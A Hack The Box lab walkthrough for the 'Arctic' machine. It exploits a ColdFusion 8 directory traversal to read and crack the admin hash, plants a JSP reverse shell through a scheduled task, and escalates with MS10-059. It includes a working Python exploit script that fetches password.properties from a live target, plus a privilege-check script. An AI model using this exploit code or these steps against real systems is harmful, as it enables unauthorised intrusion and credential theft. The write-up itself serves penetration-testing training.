
Hack The Box – Arctic Walkthrough

Introduction

This was an easy Windows machine that involved exploiting a directory traversal vulnerability in an Adobe ColdFusion 8 web application to read the administrator's password hash, cracking it with an online hash lookup tool, and abusing the ColdFusion scheduled task feature to drop a JSP reverse shell into the web root and gain remote access. Privilege escalation was possible through MS10-059, a known Windows privilege escalation vulnerability in the Tracing Feature for Services.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests

The only port that stands out is 8500, as the others are standard Windows ports used for RPC.

Enumerating port 8500

When visiting port 8500 in a browser, the site displays the directory listing below:

Navigating to /CFIDE leads to another directory listing:

Selecting administrator this time displays an “Adobe ColdFusion 8” login page:

A quick searchsploit search, excluding cross-site scripting exploits and Metasploit modules, shows that a few exploits are available.

Directory Traversal Vulnerability

After checking a few of them, one stands out, as it allows user hashes to be retrieved through a directory traversal vulnerability. Mirroring and analysing the exploit:

Testing the exploit on the target application – user hashes are displayed:

Using the CrackStation online hash lookup to obtain the clear-text credentials; ColdFusion 8 stores the administrator password as an unsalted SHA-1 hash, so a precomputed lookup table finds it instantly. The tool is available at https://crackstation.net/

Logging into the web application using admin/happyday:
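To make the traversal step concrete, here is an added Python example (not the walkthrough's own script) that requests the ColdFusion 8 password.properties file via the public CVE-2010-2861 locale traversal, parses the hash out of the response, and cracks it offline the way the CrackStation lookup did. The target host and port are command-line assumptions; the embedded sample response is constructed for the offline demo rather than captured from the box.

```python
"""Retrieve and crack the ColdFusion 8 administrator hash.

Added example, not code from the walkthrough.  The request path is the
public CVE-2010-2861 directory-traversal vector (the bug behind the
searchsploit result used above); the target host/port are assumptions
passed on the command line, and SAMPLE_RESPONSE is constructed for the
offline demo, not captured from the box.
"""
import hashlib
import re
import sys
import urllib.request

# CVE-2010-2861: enter.cfm passes the `locale` parameter to a file include.
# The traversal climbs out of the web root and the %00 (null byte) truncates
# the suffix ColdFusion appends, so lib/password.properties is read verbatim.
TRAVERSAL = ("/CFIDE/administrator/enter.cfm?locale="
             "../../../../../../../../../../ColdFusion8/lib/password.properties%00en")

# Constructed sample of what the vulnerable page returns: the properties file
# is echoed into the login page HTML.  The hash is SHA-1("happyday"), the
# admin password the walkthrough recovers; rdspassword is a placeholder.
SAMPLE_RESPONSE = (
    "<html><head><title>ColdFusion Administrator Login</title></head><body>\n"
    "rdspassword=CONSTRUCTEDPLACEHOLDER\n"
    "password=" + hashlib.sha1(b"happyday").hexdigest().upper() + "\n"
    "encrypted=true\n"
    '<form name="loginform" action="/CFIDE/administrator/enter.cfm" method="POST">\n'
    "</form></body></html>\n"
)


def build_traversal_url(host, port=8500):
    """URL that makes the target disclose password.properties."""
    return f"http://{host}:{port}{TRAVERSAL}"


def parse_password_properties(body):
    """Extract the key=value lines of password.properties from the response.

    The word boundary stops 'password=' from matching inside 'rdspassword=';
    the value class stops at whitespace, quotes and tags so HTML is ignored.
    """
    pattern = r"\b(rdspassword|password|encrypted)=([^\s<>\"&]+)"
    return {key: value for key, value in re.findall(pattern, body)}


def crack_sha1(hex_digest, candidates):
    """Offline stand-in for the CrackStation lookup.

    ColdFusion 8 stores the administrator password as an unsalted SHA-1 hex
    digest (upper-case), so a dictionary comparison is all that is needed.
    Returns the matching word or None.
    """
    target = hex_digest.strip().lower()
    for word in candidates:
        if hashlib.sha1(word.encode()).hexdigest() == target:
            return word
    return None


def fetch_and_crack(host, candidates, port=8500, timeout=15):
    """Live mode: request the traversal URL, parse the hash, try the wordlist."""
    with urllib.request.urlopen(build_traversal_url(host, port), timeout=timeout) as r:
        body = r.read().decode("latin-1", errors="replace")
    props = parse_password_properties(body)
    return props, crack_sha1(props.get("password", ""), candidates)


if __name__ == "__main__":
    # usage: python3 cf8_hash.py <target> [wordlist]   (no arguments: offline demo)
    words = ["admin", "password", "coldfusion", "happyday"]
    if len(sys.argv) > 2:
        words = open(sys.argv[2], encoding="latin-1").read().split()
    if len(sys.argv) > 1:
        props, cracked = fetch_and_crack(sys.argv[1], words)
    else:
        props = parse_password_properties(SAMPLE_RESPONSE)
        cracked = crack_sha1(props["password"], words)
    print(props)
    print("admin password:", cracked or "not in wordlist")
```

Run without arguments to see the parse and crack against the constructed response; with a host (and optionally a wordlist) it performs the live request. The same unsalted SHA-1 weakness is why an online lookup table works: any leaked CF8 hash is one dictionary away from the password.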

Scheduled Task Exploitation

The ColdFusion administrator's scheduled tasks can request a URL and save the response to a file on the server, which gives remote code execution when that file lands in the web root. The first step is to generate a reverse shell using MSFvenom with the following flags:

  • -p to specify the payload type, in this case the JSP reverse shell (java/jsp_shell_reverse_tcp)
  • LHOST to specify the local host IP address to connect back to
  • LPORT to specify the local port to connect back to

Navigating to Server Settings -> Mappings to find the filesystem path the /CFIDE directory maps to, which is where the scheduled task will write the file:

Setting up a Python web server to host the reverse shell so that it can be downloaded by the target host:

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Navigating to Debugging & Logging -> Scheduled Tasks:

Setting up a scheduled task that requests the reverse shell from the Python web server and, using the option to save the output to a file, writes it to C:\ColdFusion8\wwwroot\CFIDE\administrator\exploit.jsp:

The task has now been created; the green button runs it immediately.

The request was received by our Python web server, confirming that the target fetched the payload:

The reverse shell can then be executed by browsing to the location of the .jsp file, which is /CFIDE/administrator/exploit.jsp on port 8500 since it sits under the web root:

A callback was received, granting a reverse shell as the tolis user:

Privilege Escalation

Running the systeminfo command to enumerate the OS version, build and installed hotfixes, which is the input needed to look for known privilege escalation vulnerabilities:

Saving the output of the command to a text file on the Kali host:

Running the Windows Exploit Suggester script against the file to identify missing patches for this version of Windows. One of the options is MS10-059 (Chimichurri), a vulnerability in the Tracing Feature for Services: the service writes its trace output to a named pipe the attacker controls, which lets the attacker capture and impersonate the SYSTEM token of the connecting client. As long as the current account holds the “SeImpersonatePrivilege” privilege, arbitrary code can then be executed in the security context of SYSTEM.

Searching for proof of concepts available on GitHub for MS10-059:

Found an interesting script that can be used to exploit this vulnerability:

Cloning the exploit from GitHub

Setting up a Python web server to host the exploit

Downloading it from the target host using the certutil tool

Setting up a Netcat listener, which will catch our reverse shell when it is executed by the victim host:

Executing the exploit grants SYSTEM-level access to the machine:
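Before uploading a privilege escalation PoC it is worth confirming its preconditions from the foothold. The following added example, not from the walkthrough or from Windows Exploit Suggester, parses systeminfo and whoami /priv output and checks the things that decide whether MS10-059 applies: the target is one of the affected Windows versions, the fix (KB982799) is absent, and the account holds SeImpersonatePrivilege. The sample outputs embedded in it are constructed for the demo, not copied from the box.

```python
"""Pre-flight check for MS10-059 from the low-privilege shell.

Added example, not from the walkthrough.  Parses `systeminfo` and
`whoami /priv` output (captured from the foothold and pasted into files)
the way Windows Exploit Suggester does in miniature.  The two sample
outputs below are constructed for the demo, not copied from the box.
"""
import re
import sys

MS10_059_KB = "KB982799"   # hotfix that fixed the Tracing Feature for Services EoP
AFFECTED_OS = r"Windows (Vista|7|Server 2008)"   # MS10-059 affected Vista/7/2008/2008 R2

# Constructed sample output (abbreviated) in the layout systeminfo prints.
SAMPLE_SYSTEMINFO = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed sample output in the layout `whoami /priv` prints.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""


def parse_systeminfo(text):
    """Return the top-level 'Key: value' fields plus every KB number listed."""
    info = {}
    for line in text.splitlines():
        if ":" in line and not line.startswith(" "):   # indented lines are continuations
            key, value = line.split(":", 1)
            info[key.strip()] = value.strip()
    info["hotfixes"] = re.findall(r"\bKB\d{6,7}\b", text)
    return info


def parse_privileges(text):
    """Map privilege name -> True (Enabled) / False (Disabled) from `whoami /priv`.

    A Disabled privilege still counts as held: the exploit can enable it.
    """
    pattern = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", re.M)
    return {m.group(1): m.group(2) == "Enabled" for m in pattern.finditer(text)}


def ms10_059_preflight(systeminfo_text, whoami_text):
    """Return (go, reasons): go is True only when nothing rules the exploit out."""
    info = parse_systeminfo(systeminfo_text)
    privs = parse_privileges(whoami_text)
    reasons = []
    if not re.search(AFFECTED_OS, info.get("OS Name", "")):
        reasons.append("OS is not Vista/7/Server 2008 (R2), which MS10-059 affects")
    if MS10_059_KB in info["hotfixes"]:
        reasons.append(f"{MS10_059_KB} is installed, so MS10-059 is patched")
    if "SeImpersonatePrivilege" not in privs:
        reasons.append("account does not hold SeImpersonatePrivilege")
    return (not reasons, reasons)


if __name__ == "__main__":
    # usage: python3 preflight.py systeminfo.txt whoami_priv.txt   (no args: demo data)
    sysinfo, privs = SAMPLE_SYSTEMINFO, SAMPLE_WHOAMI_PRIV
    if len(sys.argv) == 3:
        sysinfo, privs = (open(p, errors="replace").read() for p in sys.argv[1:])
    go, reasons = ms10_059_preflight(sysinfo, privs)
    print("MS10-059 worth trying:", go)
    for reason in reasons:
        print("  -", reason)
```

The OS and hotfix checks are what the exploit suggester automates across its whole bulletin database; the privilege check is the one it cannot do for you, and it is the usual reason a token-impersonation exploit silently fails when run from a service account that lacks it.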

Conclusion

I found this box quite interesting as there was quite a lot of research involved, first of all to find the directory traversal vulnerability, then to learn how to exploit scheduled tasks on Adobe ColdFusion and finally to escalate privileges using a known Windows vulnerability in the service tracing feature.